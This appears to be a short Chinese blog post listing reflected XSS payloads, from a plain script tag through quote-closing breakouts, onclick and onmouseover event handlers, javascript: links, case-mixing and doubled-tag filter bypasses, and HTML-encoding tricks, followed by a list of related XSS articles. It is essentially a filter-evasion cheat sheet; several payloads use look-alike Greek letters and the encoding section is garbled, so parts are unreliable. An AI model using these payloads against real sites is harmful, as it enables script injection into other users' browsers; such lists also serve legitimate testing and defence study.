反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法: <script>alert(1)</script>
  2. 构造闭合语法: "><script>alert(1)</script>
  3. 当引号被转义时的语法: 1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1" οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号: 1' οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)"> "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href href

SCRIPT SCRIPT

相关推荐
工呈士2 天前
HTML与安全性:XSS、防御与最佳实践
前端·html·xss
帅云毅2 天前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
小杨升级打怪中3 天前
前端面经-JS篇(三)--事件、性能优化、防抖与节流
前端·javascript·xss
阳光普照世界和平5 天前
从单点突破到链式攻击:XSS 的渗透全路径解析
前端·web安全·xss
jonhswei5 天前
xss学习6
学习·xss
我最厉害。,。5 天前
CSRF 请求伪造&Referer 同源&置空&配合 XSS&Token 值校验&复用删除
前端·xss·csrf
萌萌哒草头将军7 天前
注意!⚠️ 🔥 🚧 PostgreSQL 存在安全漏洞,请及时更新版本或者停用删除相关服务,防止中招!🚀🚀🚀
服务器·postgresql·xss
独行soc7 天前
2025年渗透测试面试题总结-拷打题库06(题目+回答)
java·开发语言·前端·中间件·数据挖掘·php·xss
魔云连洲8 天前
深入理解前端安全:CSRF与XSS攻击详解
前端·安全·xss·csrf
vortex58 天前
详解反射型 XSS 的后续利用方式:从基础窃取到高级组合拳攻击链
前端·网络·网络安全·渗透测试·xss